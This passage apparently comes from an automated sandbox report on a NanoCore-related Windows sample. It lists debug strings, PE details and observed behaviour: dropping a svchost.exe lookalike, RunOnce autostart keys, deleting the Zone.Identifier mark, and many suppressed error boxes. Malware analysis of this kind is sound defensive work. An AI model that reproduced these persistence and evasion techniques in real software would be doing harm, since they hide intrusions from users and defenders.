            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: s9SWgUgyO5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: s9SWgUgyO5.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
            Source: Binary string: osvchost.PDB source: svchost.exe, 0000000E.00000000.312445767.00000000006F8000.00000004.00000001.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb\??\C:\Windows\mscorlib.pdb source: svchost.exe, 0000001B.00000000.379905737.0000000007412000.00000004.00000001.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: s9SWgUgyO5.exe, 00000000.00000000.271428414.0000000001394000.00000004.00000020.sdmp
            Source: Binary string: System.Core.ni.pdbRSDSD source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Configuration.pdbX source: WERCEBB.tmp.dmp.19.dr
            Source: Binary string: Accessibility.pdb\A}m8 source: WERCEBB.tmp.dmp.19.dr
            Source: Binary string: Accessibility.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: s9SWgUgyO5.PDBL source: s9SWgUgyO5.exe, 00000000.00000000.270661629.0000000000DC8000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmp
            Source: Binary string: b.pdb source: s9SWgUgyO5.exe, 00000000.00000000.270661629.0000000000DC8000.00000004.00000001.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER1CFA.tmp.dmp.34.dr
            Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: s9SWgUgyO5.exe, 0000000A.00000002.526184455.0000000006FF0000.00000004.00020000.sdmp
            Source: Binary string: System.Core.ni.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Core.pdb0 source: WERCEBB.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbQ source: s9SWgUgyO5.exe, 00000000.00000000.271428414.0000000001394000.00000004.00000020.sdmp
            Source: Binary string: $.pdb source: s9SWgUgyO5.exe, 00000000.00000000.270661629.0000000000DC8000.00000004.00000001.sdmp
            Source: Binary string: System.Windows.Forms.pdb0 source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: mscorlib.ni.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: s9SWgUgyO5.exe, 0000000A.00000002.526170898.0000000006FE0000.00000004.00020000.sdmp
            Source: Binary string: System.Drawing.pdbLEDmT source: WER1CFA.tmp.dmp.34.dr
            Source: Binary string: System.Xml.ni.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb\??\C:\Windows\mscorlib.pdbUSERPROFILE=C:\Users\user\??\C:\Windows\System.pdb source: svchost.exe, 0000000E.00000000.363840383.0000000005E12000.00000004.00000001.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbp source: s9SWgUgyO5.exe, 00000000.00000000.271428414.0000000001394000.00000004.00000020.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Configuration.ni.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: eTe^eDe\svchost.PDB source: svchost.exe, 0000000E.00000000.312445767.00000000006F8000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000000.380977185.0000000000EF8000.00000004.00000001.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Configuration.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: \??\C:\Windows\System.pdb source: svchost.exe, 0000001B.00000000.379905737.0000000007412000.00000004.00000001.sdmp
            Source: Binary string: System.Xml.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmp
            Source: Binary string: System.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: i0C:\Windows\mscorlib.pdb source: s9SWgUgyO5.exe, 00000000.00000000.270661629.0000000000DC8000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000000.312445767.00000000006F8000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000000.380977185.0000000000EF8000.00000004.00000001.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.pdb@ source: WERCEBB.tmp.dmp.19.dr
            Source: Binary string: mscorlib.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Windows.Forms.pdbLEDmT3 source: WERCEBB.tmp.dmp.19.dr
            Source: Binary string: Microsoft.VisualBasic.pdbd source: WER1CFA.tmp.dmp.34.dr
            Source: Binary string: System.Drawing.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Core.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.pdb4 source: WER1CFA.tmp.dmp.34.dr
            Source: Binary string: System.Drawing.pdbb source: WERCEBB.tmp.dmp.19.dr
            Source: Binary string: C:\Users\user\Desktop\s9SWgUgyO5.PDB source: s9SWgUgyO5.exe, 00000000.00000000.270661629.0000000000DC8000.00000004.00000001.sdmp
            Source: Binary string: System.Xml.pdbD source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmp
            Source: Binary string: svchost.PDB source: svchost.exe, 0000001B.00000000.380977185.0000000000EF8000.00000004.00000001.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Core.pdbi source: WER1CFA.tmp.dmp.34.dr
            Source: Binary string: System.ni.pdb source: WER62AE.tmp.dmp.39.dr
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeCode function: 10_2_0659A5EF push E801035Eh; retf
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeCode function: 10_2_0659B1F8 push es; ret
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeCode function: 10_2_0659CD02 push E802005Eh; ret
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeCode function: 10_2_0659DAEF push E801025Eh; retf
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeCode function: 10_2_0659C938 push 0800025Eh; ret
            Source: s9SWgUgyO5.exeStatic PE information: real checksum: 0xb4e1 should be: 0x82d7
            Source: svchost.exe.0.drStatic PE information: real checksum: 0xb4e1 should be: 0x82d7

            Persistence and Installation Behavior:

            barindex
            Drops PE files with benign system namesShow sources
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeFile created: C:\Users\Public\Documents\???????????????\svchost.exeJump to dropped file
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeFile created: C:\Users\Public\Documents\???????????????\svchost.exeJump to dropped file

            Boot Survival:

            barindex
            Creates autostart registry keys with suspicious namesShow sources
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeFile opened: C:\Users\user\Desktop\s9SWgUgyO5.exe:Zone.Identifier read attributes | delete
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
